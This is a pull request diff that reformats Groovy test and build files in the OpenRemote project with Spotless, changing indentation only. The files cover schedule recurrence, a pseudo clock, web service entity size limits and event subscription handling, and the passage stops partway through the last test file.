### PR TITLE
Enable Spotless formatting for Groovy files

### DIFF
--- a/agent/src/test/groovy/org/openremote/agent/protocol/simulator/SimulatorAgentProtocolScheduleTest.groovy
+++ b/agent/src/test/groovy/org/openremote/agent/protocol/simulator/SimulatorAgentProtocolScheduleTest.groovy
@@ -26,215 +26,215 @@ import java.time.ZoneOffset
 
 class SimulatorAgentProtocolScheduleTest extends Specification {
 
-    private static final long SECOND = 1000
-    private static final long MINUTE = SECOND * 60
-    private static final long HOUR = MINUTE * 60
-    private static final long DAY = HOUR * 24
+  private static final long SECOND = 1000
+  private static final long MINUTE = SECOND * 60
+  private static final long HOUR = MINUTE * 60
+  private static final long DAY = HOUR * 24
 
-    def "a non-recurring schedule returns its start forever"() {
-        given:
-        def start = instant("2000-01-01T00:00:00.000Z")
-        def schedule = schedule(start)
+  def "a non-recurring schedule returns its start forever"() {
+    given:
+    def start = instant("2000-01-01T00:00:00.000Z")
+    def schedule = schedule(start)
 
-        expect:
-        [
-            instant("1999-01-01T00:00:00.000Z"),
-            start,
-            instant("9999-12-31T23:59:59.999Z")
-        ].each { assert schedule.tryAdvanceActive(it, 0) == start }
+    expect:
+    [
+      instant("1999-01-01T00:00:00.000Z"),
+      start,
+      instant("9999-12-31T23:59:59.999Z")
+    ].each { assert schedule.tryAdvanceActive(it, 0) == start }
+  }
+
+  def "a non-recurring schedule with an end keeps returning its start"() {
+    given:
+    def start = instant("2000-01-01T00:00:00.000Z")
+    def end = instant("2000-01-10T00:00:00.000Z")
+    def schedule = schedule(start, end)
+
+    expect:
+    ([instant("1999-01-01T00:00:00.000Z")] + (0..9).collect { start + DAY * it })
+    .each { assert schedule.tryAdvanceActive(it, 0) == start }
+
+    and: "the end is checked separately"
+    schedule.isAfterScheduleEnd(end + 1)
+    schedule.tryAdvanceActive(end + 1, 0) == start
+  }
+
+  def "a daily recurrence returns its last occurrence after UNTIL"() {
+    given:
+    def start = instant("2000-01-01T00:00:00.000Z")
+    def schedule = schedule(start, null, "FREQ=DAILY;UNTIL=20000104T235959")
+
+    expect:
+    schedule.tryAdvanceActive(instant("1999-01-01T00:00:00.000Z") + DAY - 1, 0) == start
+    (0..3).each { day ->
+      def occurrence = start + DAY * day
+      assert schedule.tryAdvanceActive(occurrence, 0) == occurrence
+      assert schedule.tryAdvanceActive(occurrence + DAY - 1, 0) == occurrence
     }
 
-    def "a non-recurring schedule with an end keeps returning its start"() {
-        given:
-        def start = instant("2000-01-01T00:00:00.000Z")
-        def end = instant("2000-01-10T00:00:00.000Z")
-        def schedule = schedule(start, end)
+    and:
+    def lastOccurrence = instant("2000-01-04T00:00:00.000Z")
+    schedule.tryAdvanceActive(lastOccurrence, 0) == lastOccurrence
+    schedule.tryAdvanceActive(lastOccurrence + DAY, 0) == lastOccurrence
+  }
 
-        expect:
-        ([instant("1999-01-01T00:00:00.000Z")] + (0..9).collect { start + DAY * it })
-            .each { assert schedule.tryAdvanceActive(it, 0) == start }
+  def "a daily recurrence returns its last occurrence after COUNT"() {
+    given:
+    def start = instant("2000-01-01T00:00:00.000Z")
+    def schedule = schedule(start, null, "FREQ=DAILY;COUNT=4")
 
-        and: "the end is checked separately"
-        schedule.isAfterScheduleEnd(end + 1)
-        schedule.tryAdvanceActive(end + 1, 0) == start
+    expect:
+    schedule.tryAdvanceActive(instant("1999-01-01T00:00:00.000Z") + DAY - 1, 0) == start
+    (0..2).each { day ->
+      def occurrence = start + DAY * day
+      assert schedule.tryAdvanceActive(occurrence, 0) == occurrence
+      assert schedule.tryAdvanceActive(occurrence + DAY - 1, 0) == occurrence
     }
 
-    def "a daily recurrence returns its last occurrence after UNTIL"() {
-        given:
-        def start = instant("2000-01-01T00:00:00.000Z")
-        def schedule = schedule(start, null, "FREQ=DAILY;UNTIL=20000104T235959")
+    and:
+    def lastOccurrence = instant("2000-01-04T00:00:00.000Z")
+    schedule.tryAdvanceActive(lastOccurrence, 0) == lastOccurrence
+    schedule.tryAdvanceActive(lastOccurrence + DAY, 0) == lastOccurrence
+  }
 
-        expect:
-        schedule.tryAdvanceActive(instant("1999-01-01T00:00:00.000Z") + DAY - 1, 0) == start
-        (0..3).each { day ->
-            def occurrence = start + DAY * day
-            assert schedule.tryAdvanceActive(occurrence, 0) == occurrence
-            assert schedule.tryAdvanceActive(occurrence + DAY - 1, 0) == occurrence
-        }
+  def "a recurrence with BYHOUR and BYMINUTE starts at the configured time"() {
+    given:
+    def start = instant("2000-01-01T00:00:00.000Z")
+    def schedule = schedule(start, null, "FREQ=DAILY;BYHOUR=17;BYMINUTE=30")
 
-        and:
-        def lastOccurrence = instant("2000-01-04T00:00:00.000Z")
-        schedule.tryAdvanceActive(lastOccurrence, 0) == lastOccurrence
-        schedule.tryAdvanceActive(lastOccurrence + DAY, 0) == lastOccurrence
-    }
-
-    def "a daily recurrence returns its last occurrence after COUNT"() {
-        given:
-        def start = instant("2000-01-01T00:00:00.000Z")
-        def schedule = schedule(start, null, "FREQ=DAILY;COUNT=4")
-
-        expect:
-        schedule.tryAdvanceActive(instant("1999-01-01T00:00:00.000Z") + DAY - 1, 0) == start
-        (0..2).each { day ->
-            def occurrence = start + DAY * day
-            assert schedule.tryAdvanceActive(occurrence, 0) == occurrence
-            assert schedule.tryAdvanceActive(occurrence + DAY - 1, 0) == occurrence
-        }
-
-        and:
-        def lastOccurrence = instant("2000-01-04T00:00:00.000Z")
-        schedule.tryAdvanceActive(lastOccurrence, 0) == lastOccurrence
-        schedule.tryAdvanceActive(lastOccurrence + DAY, 0) == lastOccurrence
-    }
-
-    def "a recurrence with BYHOUR and BYMINUTE starts at the configured time"() {
-        given:
-        def start = instant("2000-01-01T00:00:00.000Z")
-        def schedule = schedule(start, null, "FREQ=DAILY;BYHOUR=17;BYMINUTE=30")
-
-        expect:
-        schedule.tryAdvanceActive(
+    expect:
+    schedule.tryAdvanceActive(
             instant("1999-01-01T00:00:00.000Z") + DAY - 1,
             0
-        ) == start + 17 * HOUR + 30 * MINUTE
+            ) == start + 17 * HOUR + 30 * MINUTE
+  }
+
+  def "a minutely recurrence returns its last occurrence after UNTIL"() {
+    given:
+    def start = instant("2000-01-01T00:00:00.000Z")
+    // A trailing Z would make UNTIL an OffsetDateTime, while ical4j compares LocalDateTime
+    // candidates and therefore ends the recurrence differently.
+    def schedule = schedule(start, null, "FREQ=MINUTELY;UNTIL=20000101T000500")
+
+    expect:
+    schedule.tryAdvanceActive(instant("1999-01-01T00:00:00.000Z") + MINUTE - 1, 0) == start
+    (0..3).each { minute ->
+      def occurrence = start + MINUTE * minute
+      assert schedule.tryAdvanceActive(occurrence, 0) == occurrence
+      assert schedule.tryAdvanceActive(occurrence + MINUTE - 1, 0) == occurrence
     }
 
-    def "a minutely recurrence returns its last occurrence after UNTIL"() {
-        given:
-        def start = instant("2000-01-01T00:00:00.000Z")
-        // A trailing Z would make UNTIL an OffsetDateTime, while ical4j compares LocalDateTime
-        // candidates and therefore ends the recurrence differently.
-        def schedule = schedule(start, null, "FREQ=MINUTELY;UNTIL=20000101T000500")
+    and:
+    def lastOccurrence = instant("2000-01-01T00:04:00.000Z")
+    schedule.tryAdvanceActive(lastOccurrence + MINUTE, 0) == lastOccurrence
+    schedule.tryAdvanceActive(lastOccurrence + 2 * MINUTE, 0) == lastOccurrence
+  }
 
-        expect:
-        schedule.tryAdvanceActive(instant("1999-01-01T00:00:00.000Z") + MINUTE - 1, 0) == start
-        (0..3).each { minute ->
-            def occurrence = start + MINUTE * minute
-            assert schedule.tryAdvanceActive(occurrence, 0) == occurrence
-            assert schedule.tryAdvanceActive(occurrence + MINUTE - 1, 0) == occurrence
-        }
+  def "a recurrence catches up with the current time"() {
+    given:
+    def start = instant("2000-01-01T00:00:00.000Z")
+    def schedule = schedule(start, null, "FREQ=MINUTELY")
+    def now = instant("2000-01-01T01:00:00.000Z")
 
-        and:
-        def lastOccurrence = instant("2000-01-01T00:04:00.000Z")
-        schedule.tryAdvanceActive(lastOccurrence + MINUTE, 0) == lastOccurrence
-        schedule.tryAdvanceActive(lastOccurrence + 2 * MINUTE, 0) == lastOccurrence
-    }
+    expect:
+    schedule.tryAdvanceActive(now, 0) == start + 60 * MINUTE
+    schedule.tryAdvanceActive(now + MINUTE, 0) == start + 61 * MINUTE
+  }
 
-    def "a recurrence catches up with the current time"() {
-        given:
-        def start = instant("2000-01-01T00:00:00.000Z")
-        def schedule = schedule(start, null, "FREQ=MINUTELY")
-        def now = instant("2000-01-01T01:00:00.000Z")
+  def "an hourly recurrence calculates offset delays"() {
+    given:
+    def start = instant("2000-01-01T00:00:00.000Z")
+    def schedule = schedule(start, null, "FREQ=HOURLY")
 
-        expect:
-        schedule.tryAdvanceActive(now, 0) == start + 60 * MINUTE
-        schedule.tryAdvanceActive(now + MINUTE, 0) == start + 61 * MINUTE
-    }
+    expect:
+    delays(schedule, [
+      (start): 100 * SECOND,
+      (instant("2000-01-01T00:01:39.000Z")): SECOND,
+      (instant("2000-01-01T00:01:40.000Z")): 3600 * SECOND
+    ])
+  }
 
-    def "an hourly recurrence calculates offset delays"() {
-        given:
-        def start = instant("2000-01-01T00:00:00.000Z")
-        def schedule = schedule(start, null, "FREQ=HOURLY")
-
-        expect:
-        delays(schedule, [
-            (start):                                      100 * SECOND,
-            (instant("2000-01-01T00:01:39.000Z")):        SECOND,
-            (instant("2000-01-01T00:01:40.000Z")):        3600 * SECOND
-        ])
-    }
-
-    def "an hourly recurrence with a future start calculates offset delays"() {
-        given:
-        def schedule = schedule(
+  def "an hourly recurrence with a future start calculates offset delays"() {
+    given:
+    def schedule = schedule(
             instant("2000-01-02T00:00:00.000Z"),
             null,
             "FREQ=HOURLY"
-        )
+            )
 
-        expect:
-        delays(schedule, [
-            (instant("2000-01-01T00:00:00.000Z")): DAY + 100 * SECOND,
-            (instant("2000-01-01T00:01:00.000Z")): DAY + 40 * SECOND,
-            (instant("2000-01-01T00:02:00.000Z")): DAY - 20 * SECOND
-        ])
-    }
+    expect:
+    delays(schedule, [
+      (instant("2000-01-01T00:00:00.000Z")): DAY + 100 * SECOND,
+      (instant("2000-01-01T00:01:00.000Z")): DAY + 40 * SECOND,
+      (instant("2000-01-01T00:02:00.000Z")): DAY - 20 * SECOND
+    ])
+  }
 
-    def "an hourly recurrence with UNTIL calculates delays through its last occurrence"() {
-        given:
-        def schedule = schedule(
+  def "an hourly recurrence with UNTIL calculates delays through its last occurrence"() {
+    given:
+    def schedule = schedule(
             instant("2000-01-01T00:00:00.000Z"),
             null,
             "FREQ=HOURLY;UNTIL=20000101T020000"
-        )
+            )
 
-        expect:
-        delays(schedule, recurringDelayExpectations())
+    expect:
+    delays(schedule, recurringDelayExpectations())
 
-        and: "UNTIL is checked separately while delays remain positive before UNTIL plus offset"
-        schedule.isAfterScheduleEnd(instant("2000-01-01T03:00:00.001Z"))
-    }
+    and: "UNTIL is checked separately while delays remain positive before UNTIL plus offset"
+    schedule.isAfterScheduleEnd(instant("2000-01-01T03:00:00.001Z"))
+  }
 
-    def "an hourly recurrence with COUNT calculates delays through its last occurrence"() {
-        given:
-        def schedule = schedule(
+  def "an hourly recurrence with COUNT calculates delays through its last occurrence"() {
+    given:
+    def schedule = schedule(
             instant("2000-01-01T00:00:00.000Z"),
             null,
             "FREQ=HOURLY;COUNT=3"
-        )
+            )
 
-        expect:
-        delays(schedule, recurringDelayExpectations())
+    expect:
+    delays(schedule, recurringDelayExpectations())
+  }
+
+  private static void delays(
+          SimulatorProtocol.Schedule schedule,
+          Map<Long, Long> expectedDelays
+  ) {
+    expectedDelays.each { now, expected ->
+      def timeSinceOccurrenceStarted = now - schedule.tryAdvanceActive(now, 0)
+      assert schedule.getDelay(100, timeSinceOccurrenceStarted).asLong == expected
     }
+  }
 
-    private static void delays(
-        SimulatorProtocol.Schedule schedule,
-        Map<Long, Long> expectedDelays
-    ) {
-        expectedDelays.each { now, expected ->
-            def timeSinceOccurrenceStarted = now - schedule.tryAdvanceActive(now, 0)
-            assert schedule.getDelay(100, timeSinceOccurrenceStarted).asLong == expected
-        }
-    }
+  private static Map<Long, Long> recurringDelayExpectations() {
+    [
+      (instant("2000-01-01T00:00:00.000Z")): 100 * SECOND,
+      (instant("2000-01-01T00:01:00.000Z")): 40 * SECOND,
+      (instant("2000-01-01T00:02:00.000Z")): 3580 * SECOND,
+      (instant("2000-01-01T01:00:00.000Z")): 100 * SECOND,
+      (instant("2000-01-01T01:01:00.000Z")): 40 * SECOND,
+      (instant("2000-01-01T01:02:00.000Z")): 3580 * SECOND,
+      (instant("2000-01-01T02:00:00.000Z")): 100 * SECOND,
+      (instant("2000-01-01T02:01:00.000Z")): 40 * SECOND,
+      (instant("2000-01-01T02:02:00.000Z")): -20 * SECOND,
+      (instant("2000-01-01T03:00:00.000Z")): -3500 * SECOND
+    ]
+  }
 
-    private static Map<Long, Long> recurringDelayExpectations() {
-        [
-            (instant("2000-01-01T00:00:00.000Z")): 100 * SECOND,
-            (instant("2000-01-01T00:01:00.000Z")): 40 * SECOND,
-            (instant("2000-01-01T00:02:00.000Z")): 3580 * SECOND,
-            (instant("2000-01-01T01:00:00.000Z")): 100 * SECOND,
-            (instant("2000-01-01T01:01:00.000Z")): 40 * SECOND,
-            (instant("2000-01-01T01:02:00.000Z")): 3580 * SECOND,
-            (instant("2000-01-01T02:00:00.000Z")): 100 * SECOND,
-            (instant("2000-01-01T02:01:00.000Z")): 40 * SECOND,
-            (instant("2000-01-01T02:02:00.000Z")): -20 * SECOND,
-            (instant("2000-01-01T03:00:00.000Z")): -3500 * SECOND
-        ]
-    }
-
-    private static SimulatorProtocol.Schedule schedule(
-        long start,
-        Long end = null,
-        String recurrence = null
-    ) {
-        new SimulatorProtocol.Schedule(
+  private static SimulatorProtocol.Schedule schedule(
+          long start,
+          Long end = null,
+          String recurrence = null
+  ) {
+    new SimulatorProtocol.Schedule(
             LocalDateTime.ofInstant(Instant.ofEpochMilli(start), ZoneOffset.UTC),
             end == null ? null : LocalDateTime.ofInstant(Instant.ofEpochMilli(end), ZoneOffset.UTC),
             recurrence
-        )
-    }
+            )
+  }
 
-    private static long instant(String value) {
-        Instant.parse(value).toEpochMilli()
-    }
+  private static long instant(String value) {
+    Instant.parse(value).toEpochMilli()
+  }
 }

--- a/buildSrc/src/main/groovy/TestSummaryListener.groovy
+++ b/buildSrc/src/main/groovy/TestSummaryListener.groovy
@@ -22,47 +22,47 @@ import org.gradle.api.tasks.testing.TestResult
 
 class TestSummaryListener implements TestListener, Serializable {
 
-    private final List<String> failedTests = Collections.synchronizedList(new ArrayList<>())
+  private final List<String> failedTests = Collections.synchronizedList(new ArrayList<>())
 
-    @Override
-    void beforeSuite(TestDescriptor suite) {}
+  @Override
+  void beforeSuite(TestDescriptor suite) {}
 
-    @Override
-    void afterSuite(TestDescriptor desc, TestResult result) {
-        if (desc.parent != null) {
-            return
-        }
-
-        def output = "Results: ${result.resultType} (${result.testCount} tests, ${result.successfulTestCount} passed, ${result.failedTestCount} failed, ${result.skippedTestCount} skipped)"
-        def startItem = '|  '
-        def endItem = '  |'
-        def repeatLength = startItem.length() + output.length() + endItem.length()
-
-        println '\n' +
-                ('-' * repeatLength) + '\n' +
-                startItem + output + endItem + '\n' +
-                ('-' * repeatLength)
-
-        def failures = new ArrayList<>(failedTests).sort()
-
-        if (!failures.empty) {
-            println '\nFailed tests:'
-            failures.each { failure ->
-                println "  - ${failure}"
-            }
-        }
+  @Override
+  void afterSuite(TestDescriptor desc, TestResult result) {
+    if (desc.parent != null) {
+      return
     }
 
-    @Override
-    void beforeTest(TestDescriptor desc) {}
+    def output = "Results: ${result.resultType} (${result.testCount} tests, ${result.successfulTestCount} passed, ${result.failedTestCount} failed, ${result.skippedTestCount} skipped)"
+    def startItem = '|  '
+    def endItem = '  |'
+    def repeatLength = startItem.length() + output.length() + endItem.length()
 
-    @Override
-    void afterTest(TestDescriptor desc, TestResult result) {
-        if (result.resultType == TestResult.ResultType.FAILURE) {
-            def className = desc.className ?: desc.parent?.name ?: '<unknown>'
-            failedTests.add("${className} > ${desc.name}")
-        }
+    println '\n' +
+            ('-' * repeatLength) + '\n' +
+            startItem + output + endItem + '\n' +
+            ('-' * repeatLength)
 
-        println "${desc.className} > ${desc.name} took: ${(result.endTime - result.startTime)}ms"
+    def failures = new ArrayList<>(failedTests).sort()
+
+    if (!failures.empty) {
+      println '\nFailed tests:'
+      failures.each { failure ->
+        println "  - ${failure}"
+      }
     }
+  }
+
+  @Override
+  void beforeTest(TestDescriptor desc) {}
+
+  @Override
+  void afterTest(TestDescriptor desc, TestResult result) {
+    if (result.resultType == TestResult.ResultType.FAILURE) {
+      def className = desc.className ?: desc.parent?.name ?: '<unknown>'
+      failedTests.add("${className} > ${desc.name}")
+    }
+
+    println "${desc.className} > ${desc.name} took: ${(result.endTime - result.startTime)}ms"
+  }
 }

--- a/container/src/test/groovy/org/openremote/container/timer/PseudoClockTest.groovy
+++ b/container/src/test/groovy/org/openremote/container/timer/PseudoClockTest.groovy
@@ -26,37 +26,37 @@ import java.time.ZoneId
 
 class PseudoClockTest extends Specification {
 
-    TimerService.Clock clock
+  TimerService.Clock clock
 
-    def setup() {
-        clock = TimerService.Clock.PSEUDO
-        clock.init()
-        clock.stop()
-    }
+  def setup() {
+    clock = TimerService.Clock.PSEUDO
+    clock.init()
+    clock.stop()
+  }
 
-    def "setTime sets #date at midnight in #zone to #expected milliseconds"() {
-        expect:
-        clock.setTime(LocalDate.parse(date), LocalTime.MIDNIGHT, ZoneId.of(zone)) == expected
-        clock.currentTimeMillis == expected
+  def "setTime sets #date at midnight in #zone to #expected milliseconds"() {
+    expect:
+    clock.setTime(LocalDate.parse(date), LocalTime.MIDNIGHT, ZoneId.of(zone)) == expected
+    clock.currentTimeMillis == expected
 
-        where:
-        date         | zone  || expected
-        "1970-01-01" | "UTC" || 0L
-        "1970-01-02" | "UTC" || 24L * 3_600_000
-        "1970-01-01" | "CET" || -3_600_000L
-        "1970-01-02" | "CET" || 23L * 3_600_000
-    }
+    where:
+    date | zone || expected
+    "1970-01-01" | "UTC" || 0L
+    "1970-01-02" | "UTC" || 24L * 3_600_000
+    "1970-01-01" | "CET" || -3_600_000L
+    "1970-01-02" | "CET" || 23L * 3_600_000
+  }
 
-    def "setTime sets #timestamp to #expected milliseconds"() {
-        expect:
-        clock.setTime(timestamp) == expected
-        clock.currentTimeMillis == expected
+  def "setTime sets #timestamp to #expected milliseconds"() {
+    expect:
+    clock.setTime(timestamp) == expected
+    clock.currentTimeMillis == expected
 
-        where:
-        timestamp                       || expected
-        "1970-01-01T00:00:00.000Z"      || 0L
-        "1970-01-02T00:00:00.000Z"      || 24L * 3_600_000
-        "1970-01-01T00:00:00.000+01:00" || -3_600_000L
-        "1970-01-02T00:00:00.000+01:00" || 23L * 3_600_000
-    }
+    where:
+    timestamp || expected
+    "1970-01-01T00:00:00.000Z" || 0L
+    "1970-01-02T00:00:00.000Z" || 24L * 3_600_000
+    "1970-01-01T00:00:00.000+01:00" || -3_600_000L
+    "1970-01-02T00:00:00.000+01:00" || 23L * 3_600_000
+  }
 }

--- a/container/src/test/groovy/org/openremote/container/web/WebServiceEntitySizeConfigTest.groovy
+++ b/container/src/test/groovy/org/openremote/container/web/WebServiceEntitySizeConfigTest.groovy
@@ -24,42 +24,42 @@ import spock.lang.Specification
 
 class WebServiceEntitySizeConfigTest extends Specification {
 
-    def "uses #scenario entity size limits"() {
-        given:
-        def config = [
-            (WebService.OR_WEBSERVER_LISTEN_HOST): "127.0.0.1",
-            (WebService.OR_WEBSERVER_LISTEN_PORT): "0"
-        ] + overrides
-        def container = Stub(Container) {
-            getConfig() >> config
-            getService(IdentityService) >> null
-            getService(_) >> { Class type ->
-                throw new IllegalStateException("Service not available in test container: ${type.name}")
-            }
-        }
-        def service = new TrackingWebService()
+  def "uses #scenario entity size limits"() {
+    given:
+    def config = [
+      (WebService.OR_WEBSERVER_LISTEN_HOST): "127.0.0.1",
+      (WebService.OR_WEBSERVER_LISTEN_PORT): "0"
+    ] + overrides
+    def container = Stub(Container) {
+      getConfig() >> config
+      getService(IdentityService) >> null
+      getService(_) >> { Class type ->
+        throw new IllegalStateException("Service not available in test container: ${type.name}")
+      }
+    }
+    def service = new TrackingWebService()
 
-        when:
-        service.init(container)
+    when:
+    service.init(container)
 
-        then:
-        service.multipartLimit == expectedMultipartLimit
-        service.maxLimit == expectedMaxLimit
+    then:
+    service.multipartLimit == expectedMultipartLimit
+    service.maxLimit == expectedMaxLimit
 
-        where:
-        scenario     | overrides                                                                                                                 || expectedMultipartLimit                                    | expectedMaxLimit
-        "default"    | [:]                                                                                                                       || WebService.OR_WEBSERVER_MULTIPART_MAX_ENTITY_SIZE_DEFAULT | WebService.OR_WEBSERVER_MAX_ENTITY_SIZE_DEFAULT
-        "configured" | [(WebService.OR_WEBSERVER_MULTIPART_MAX_ENTITY_SIZE): "1024", (WebService.OR_WEBSERVER_MAX_ENTITY_SIZE): "2048"]           || 1024L                                                     | 2048L
-        "invalid"    | [(WebService.OR_WEBSERVER_MULTIPART_MAX_ENTITY_SIZE): "invalid", (WebService.OR_WEBSERVER_MAX_ENTITY_SIZE): "also_invalid"] || WebService.OR_WEBSERVER_MULTIPART_MAX_ENTITY_SIZE_DEFAULT | WebService.OR_WEBSERVER_MAX_ENTITY_SIZE_DEFAULT
+    where:
+    scenario | overrides || expectedMultipartLimit | expectedMaxLimit
+    "default" | [:] || WebService.OR_WEBSERVER_MULTIPART_MAX_ENTITY_SIZE_DEFAULT | WebService.OR_WEBSERVER_MAX_ENTITY_SIZE_DEFAULT
+    "configured" | [(WebService.OR_WEBSERVER_MULTIPART_MAX_ENTITY_SIZE): "1024", (WebService.OR_WEBSERVER_MAX_ENTITY_SIZE): "2048"] || 1024L | 2048L
+    "invalid" | [(WebService.OR_WEBSERVER_MULTIPART_MAX_ENTITY_SIZE): "invalid", (WebService.OR_WEBSERVER_MAX_ENTITY_SIZE): "also_invalid"] || WebService.OR_WEBSERVER_MULTIPART_MAX_ENTITY_SIZE_DEFAULT | WebService.OR_WEBSERVER_MAX_ENTITY_SIZE_DEFAULT
+  }
+
+  static class TrackingWebService extends WebService {
+    long getMultipartLimit() {
+      multipartMaxEntitySize
     }
 
-    static class TrackingWebService extends WebService {
-        long getMultipartLimit() {
-            multipartMaxEntitySize
-        }
-
-        long getMaxLimit() {
-            maxEntitySize
-        }
+    long getMaxLimit() {
+      maxEntitySize
     }
+  }
 }

--- a/manager/test/src/groovy/org/openremote/manager/event/ClientEventServiceSubscriptionTest.groovy
+++ b/manager/test/src/groovy/org/openremote/manager/event/ClientEventServiceSubscriptionTest.groovy
@@ -38,130 +38,130 @@ import static org.openremote.model.Constants.REALM_PARAM_NAME
 
 class ClientEventServiceSubscriptionTest extends Specification {
 
-    def "subscribes and unsubscribes by event type and subscription id"() {
-        given:
-        def service = new TestClientEventService()
-        def channel = dummyChannel()
-        String sessionKey = "session-1"
-        service.sessionChannels.put(sessionKey, channel)
+  def "subscribes and unsubscribes by event type and subscription id"() {
+    given:
+    def service = new TestClientEventService()
+    def channel = dummyChannel()
+    String sessionKey = "session-1"
+    service.sessionChannels.put(sessionKey, channel)
 
-        and:
-        def subscription = new EventSubscription<>(SyslogEvent.class, null, "sub-1")
+    and:
+    def subscription = new EventSubscription<>(SyslogEvent.class, null, "sub-1")
 
-        when: "subscribing"
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, subscription))
+    when: "subscribing"
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, subscription))
 
-        then:
-        service.websocketSessionSubscriptionConsumers[sessionKey].size() == 1
-        service.eventSubscriptions.size() == 1
-        service.sentPayloads.last().is(subscription)
+    then:
+    service.websocketSessionSubscriptionConsumers[sessionKey].size() == 1
+    service.eventSubscriptions.size() == 1
+    service.sentPayloads.last().is(subscription)
 
-        when: "unsubscribing with event type + subscription id"
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, new CancelEventSubscription(SyslogEvent.class, "sub-1")))
+    when: "unsubscribing with event type + subscription id"
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, new CancelEventSubscription(SyslogEvent.class, "sub-1")))
 
-        then:
-        !service.websocketSessionSubscriptionConsumers.containsKey(sessionKey)
-        service.eventSubscriptions.empty
+    then:
+    !service.websocketSessionSubscriptionConsumers.containsKey(sessionKey)
+    service.eventSubscriptions.empty
+  }
+
+  def "unsubscribes all matching subscriptions when only event type is provided"() {
+    given:
+    def service = new TestClientEventService()
+    def channel = dummyChannel()
+    String sessionKey = "session-2"
+    service.sessionChannels.put(sessionKey, channel)
+
+    and:
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(SyslogEvent.class, null, "sub-a")))
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(SyslogEvent.class, null, "sub-b")))
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(AlarmEvent.class)))
+
+    expect:
+    service.websocketSessionSubscriptionConsumers[sessionKey].size() == 3
+
+    when:
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, new CancelEventSubscription(Event.getEventType(SyslogEvent.class), null)))
+
+    then:
+    service.websocketSessionSubscriptionConsumers[sessionKey].size() == 1
+    service.websocketSessionSubscriptionConsumers[sessionKey].keySet() == ["alarm::"] as Set
+    service.eventSubscriptions.size() == 1
+  }
+
+  def "unsubscribes all matching subscriptions when only subscription id is provided"() {
+    given:
+    def service = new TestClientEventService()
+    def channel = dummyChannel()
+    String sessionKey = "session-3"
+    service.sessionChannels.put(sessionKey, channel)
+
+    and:
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(SyslogEvent.class, null, "shared-id")))
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(AlarmEvent.class, null, "shared-id")))
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(AlarmEvent.class)))
+
+    expect:
+    service.websocketSessionSubscriptionConsumers[sessionKey].size() == 3
+
+    when:
+    service.procesInboundEvent(exchangeFor(sessionKey, channel, new CancelEventSubscription("shared-id")))
+
+    then:
+    service.websocketSessionSubscriptionConsumers[sessionKey].size() == 1
+    service.websocketSessionSubscriptionConsumers[sessionKey].keySet() == ["alarm::"] as Set
+    service.eventSubscriptions.size() == 1
+  }
+
+  @Unroll
+  def "rejects subscription when delimiter is present in #fieldName"() {
+    given:
+    def service = new TestClientEventService()
+    def channel = dummyChannel()
+    String sessionKey = "session-4"
+    service.sessionChannels.put(sessionKey, channel)
+
+    when:
+    def exchange = exchangeFor(sessionKey, channel, subscription)
+    service.procesInboundEvent(exchange)
+
+    then:
+    exchange.routeStop
+    !service.websocketSessionSubscriptionConsumers.containsKey(sessionKey)
+    service.eventSubscriptions.empty
+    service.sentPayloads.size() == 1
+    service.sentPayloads[0] instanceof UnauthorizedEventSubscription
+
+    where:
+    fieldName | subscription
+    "eventType" | new EventSubscription<>("bad::event")
+    "subscriptionId" | new EventSubscription<>(SyslogEvent.class, null, "bad::id")
+  }
+
+  private Exchange exchangeFor(String sessionKey, WebSocketChannel channel, Object body) {
+    Exchange exchange = new DefaultExchange(new DefaultCamelContext())
+    exchange.in.body = body
+    exchange.in.setHeader(UndertowConstants.CONNECTION_KEY, sessionKey)
+    exchange.in.setHeader(UndertowConstants.CHANNEL, channel)
+    exchange.in.setHeader(AUTH_CONTEXT, Stub(AuthContext))
+    exchange.in.setHeader(REALM_PARAM_NAME, "master")
+    exchange
+  }
+
+  private WebSocketChannel dummyChannel() {
+    Stub(WebSocketChannel)
+  }
+
+  private static class TestClientEventService extends ClientEventService {
+    final List<Object> sentPayloads = []
+
+    @Override
+    boolean authorizeEventSubscription(String realm, AuthContext authContext, EventSubscription<?> subscription) {
+      return true
     }
 
-    def "unsubscribes all matching subscriptions when only event type is provided"() {
-        given:
-        def service = new TestClientEventService()
-        def channel = dummyChannel()
-        String sessionKey = "session-2"
-        service.sessionChannels.put(sessionKey, channel)
-
-        and:
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(SyslogEvent.class, null, "sub-a")))
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(SyslogEvent.class, null, "sub-b")))
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(AlarmEvent.class)))
-
-        expect:
-        service.websocketSessionSubscriptionConsumers[sessionKey].size() == 3
-
-        when:
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, new CancelEventSubscription(Event.getEventType(SyslogEvent.class), null)))
-
-        then:
-        service.websocketSessionSubscriptionConsumers[sessionKey].size() == 1
-        service.websocketSessionSubscriptionConsumers[sessionKey].keySet() == ["alarm::"] as Set
-        service.eventSubscriptions.size() == 1
+    @Override
+    void sendToWebsocketSession(String sessionKey, Object data) {
+      sentPayloads.add(data)
     }
-
-    def "unsubscribes all matching subscriptions when only subscription id is provided"() {
-        given:
-        def service = new TestClientEventService()
-        def channel = dummyChannel()
-        String sessionKey = "session-3"
-        service.sessionChannels.put(sessionKey, channel)
-
-        and:
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(SyslogEvent.class, null, "shared-id")))
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(AlarmEvent.class, null, "shared-id")))
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, new EventSubscription<>(AlarmEvent.class)))
-
-        expect:
-        service.websocketSessionSubscriptionConsumers[sessionKey].size() == 3
-
-        when:
-        service.procesInboundEvent(exchangeFor(sessionKey, channel, new CancelEventSubscription("shared-id")))
-
-        then:
-        service.websocketSessionSubscriptionConsumers[sessionKey].size() == 1
